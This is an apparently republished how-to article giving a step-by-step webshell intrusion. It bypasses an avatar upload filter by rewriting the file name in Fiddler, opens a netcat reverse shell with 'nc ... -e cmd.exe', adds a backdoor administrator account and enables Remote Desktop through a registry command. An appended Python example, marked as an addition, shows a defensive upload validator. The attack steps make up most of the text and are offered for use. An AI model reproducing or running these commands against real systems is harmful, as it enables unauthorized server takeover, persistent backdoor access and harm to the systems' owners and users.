Webshell backdoor upload process

2025-01-22 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

1. Change the extension of webshell.php to jpg or another image format, i.e. web.jpg.

2. Open the corresponding URL, register an account and choose to upload an avatar. Run Fiddler with a breakpoint set while web.jpg is being uploaded, switch to the Raw view and wait until the corresponding request appears. In the request, change the second place that contains the name of the uploaded image to web.php, then let the request continue.

3. At this point the backdoor program has been uploaded successfully. Copy the part of the server's response that contains the path, paste it after the website URL (overwriting the .php part) and refresh the web page.

4. Enter the corresponding password to reach the control page on the server, and upload the local nc.exe (netcat) to the root directory of its C: drive.

5. Then open a cmd command window locally, change to the directory where nc.exe is located and run it.

6. After starting nc.exe, type nc -vv -l -p 8080 after "Cmd line:" to listen.

7. Select the Execute Command window on the control page of the server and enter 'c:\nc.exe -vv [own ip port] -e cmd.exe' to start nc (this binds cmd.exe on the server-side host to the corresponding port of your own machine).

8. Then you can add your own account as an administrator. The specific actions are as follows:

(1) net user hacker 3836546 /add (add a user)

(2) net user localgroup administrators test /add (add to the administrators group)

9. Write to the registry: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(Remote Desktop is enabled under win2k, winxp and win2k3 without a reboot.)

10. Sometimes port 3389 needs to be modified:

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]

11. After completing the above process, you can access the server-side host and operate it.
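Steps 1 to 3 work only because the server trusts the file name carried in the upload request. The following added example (not part of the original article) shows a server-side check that ignores that name; the function name, the size limit and the image allowlist are assumptions made for illustration.

```python
import secrets

# Allowlist: leading magic bytes -> extension the server assigns.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# Defence in depth: markers that never belong inside an avatar image.
SCRIPT_MARKERS = (b"<?php", b"<script")
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for an avatar

# Constructed sample inputs (placeholders, not real files).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
RENAMED_SCRIPT = b"<?php /* placeholder */ ?>"
POLYGLOT = b"GIF89a" + RENAMED_SCRIPT


class UploadRejected(Exception):
    """Raised when an upload fails server-side validation."""


def store_name_for_avatar(client_filename: str, body: bytes) -> str:
    """Return a server-chosen file name for the avatar or raise UploadRejected.

    client_filename can be rewritten in transit (step 2), so it is
    deliberately ignored: neither the stored name nor its extension use it.
    """
    if not body or len(body) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    ext = next((e for m, e in MAGIC.items() if body.startswith(m)), None)
    if ext is None:
        raise UploadRejected("content is not an allowlisted image type")
    lowered = body.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise UploadRejected("script marker inside image data")
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name, data in [("web.php", PNG_SAMPLE), ("web.php", RENAMED_SCRIPT),
                       ("web.jpg", POLYGLOT)]:
        try:
            print(name, "->", store_name_for_avatar(name, data))
        except UploadRejected as err:
            print(name, "-> rejected:", err)
```

The returned name should be written to a directory from which the web server serves files statically and never executes scripts.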
